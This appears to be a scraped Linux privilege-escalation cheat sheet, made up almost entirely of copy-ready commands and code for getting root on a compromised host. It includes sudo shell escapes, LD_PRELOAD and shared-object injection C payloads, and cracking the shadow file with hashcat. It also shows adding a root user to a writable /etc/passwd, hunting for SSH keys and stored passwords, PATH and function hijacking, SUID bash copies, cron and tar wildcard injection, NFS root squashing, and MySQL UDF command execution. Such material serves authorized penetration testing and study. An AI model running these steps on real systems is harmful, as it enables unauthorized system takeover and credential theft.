Test For Kernel Exploits
Test For sudo permissions
General Scoping
Copy grep -Ri 'db' /var/www --color=auto
Copy grep -Ri 'sql' /var/www --color=auto
Copy grep -Ri '$db_name' /var/www --color=auto
Copy ls -ls /etc anything other than root:root root:fuse root:shadow root:dip
Copy ls -lsa /etc | grep -i '.secret'
Copy ls -lsaR /var/spool/mail Vulnerable Driver Discovery
List drivers
get libata driver information and version
Test SUDO
Reference https://gtfobins.github.io/
Nano
Copy sudo find /bin -name nano -exec /bin/sh \; Awk
Copy sudo awk 'BEGIN {system("/bin/sh")}' Nmap
Copy echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse Vim
LD_PRELOAD
create file as malicious.c
Copy #include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
} compile and load
Copy gcc -fPIC -shared -o /tmp/malicious.so malicious.c -nostartfiles
Copy sudo LD_PRELOAD=/tmp/malicious.so apache2 Shared Object Injection
Copy find / -type f -perm -04000 -ls 2>/dev/null Run strace on SUIDs to find "foundso.so"
Copy strace /usr/local/bin/SuidFromPreviousOutput 2>&1 | grep -i -E "open|access|no such file"
Copy mkdir /home/user/.config
Copy cd /home/user/.config create foundso.c
Copy #include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
Copy gcc -shared -o /home/user/.config/foundso.so -fPIC /home/user/.config/foundso.c
/usr/local/bin/somesuid
Copy sudo apache2 -f /etc/shadow Test SUID files
Reference https://gtfobins.github.io/ and google the rest not listed.
Copy find / -perm /4000 2> /dev/null Test etc/passwd & etc/shadow
Test for readable / writeable /etc/passwd OR /etc/shadow
Copy ls -la /etc/passwd /etc/shadow Only if Both Readable
Copy unshadow passwd shadow > unshadowed.txt
Copy hashcat -m 1800 unshadowed.txt rockyou.txt -O Writable etc/passwd
Copy openssl passwd thescriptkid
Copy echo 'thescriptkid:$1$ZEx4UyBv$/2BpqiGuy7vuNC7X9SsTO0:0:0:thescriptkid:/home/thescriptkid:/bin/bash' >> /etc/passwd Stored Passwords & Keys
OVPN Files
Copy find / -iname "*.ovpn" 2> /dev/null
Copy find / -iname "config" 2> /dev/null | grep -i "irssi"
Copy cat filename | grep -i passw Bash History
Copy cat /home/*/.bash_history | grep -i passw SSH Keys
Copy find / -name id_rsa 2> /dev/null
Copy ssh -i id_rsa someuser@$ip Abusing Intended Functionality
Symlinks
Environment Variables
Path
Copy find / -type f -perm -04000 -ls 2>/dev/null
Copy strings /usr/local/bin/onfoundsuid C functions such as setresgid, setresuid, and system are of interest and should be investigated. Relative path commands such as "service" apache2 start can be abused.
Copy echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
Copy gcc /tmp/service.c -o /tmp/service
Copy export PATH=/tmp:$PATH
Copy /usr/local/bin/onfoundsuid Functions, ShellOpts & PS4
Copy find / -type f -perm -04000 -ls 2>/dev/null
Copy strings /usr/local/bin/onfoundsuid C functions such as setresgid, setresuid, and system are of interest and should be investigated. Absolute or Relative path commands such as "service" can be abused by creating functions in the current shell session.
Method 1
Copy function /usr/sbin/onfoundsuid() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
Copy export -f /usr/sbin/service
Copy /usr/local/bin/onfoundsuid Method 2
Copy env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash &&
Copy chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/onfoundsuid; set +x; /tmp/bash -p' Capabilities
Copy getcap -r / 2>/dev/null Python 2.6
Copy /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' Cron
Copy cat /var/spool/cron/crontabs/root Path
This abuses misconfigured path in "/etc/crontab". If a user has write permissions in the directory that is in the path. create a file with the same name as the cronjob with malicious contents.
Copy echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /writeable/directory/somefile
Copy chmod +x /wrietable/directory/somefile Wildcards
Tar
Exploitable if cronjob script that is using tar and has a wildcard * Example: tar czf /tmp/backup.tar.gz
Copy echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
/home/user/--checkpoint=1
Copy touch /home/user/--checkpoint-action=exec=sh\ runme.sh Wait for execution
File Overwrite
Exploitable if script is writeable by the current user
Copy echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /path/to/writable/writablescript NFS Root Squashing
Victim Machine
Kali Machine
Copy mount -o rw,vers=2 ip:/tmp /tmp/1
Copy echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/thescriptkid.c
Copy gcc /tmp/1/x.c -o /tmp/1/thescriptkid
Copy chmod +s /tmp/1/thescriptkid Victim Machine
Mysql
prequisites - a valid database
Copy CREATE FUNCTION sys_eval RETURNS INT SONAME 'lib_mysqludf_sys.so';
Copy select sys_eval("cp /bin/bash /var/tmp/bash ; chmod u+s /var/tmp/bash"); Run LinPEAS
try passwords found in config PHP files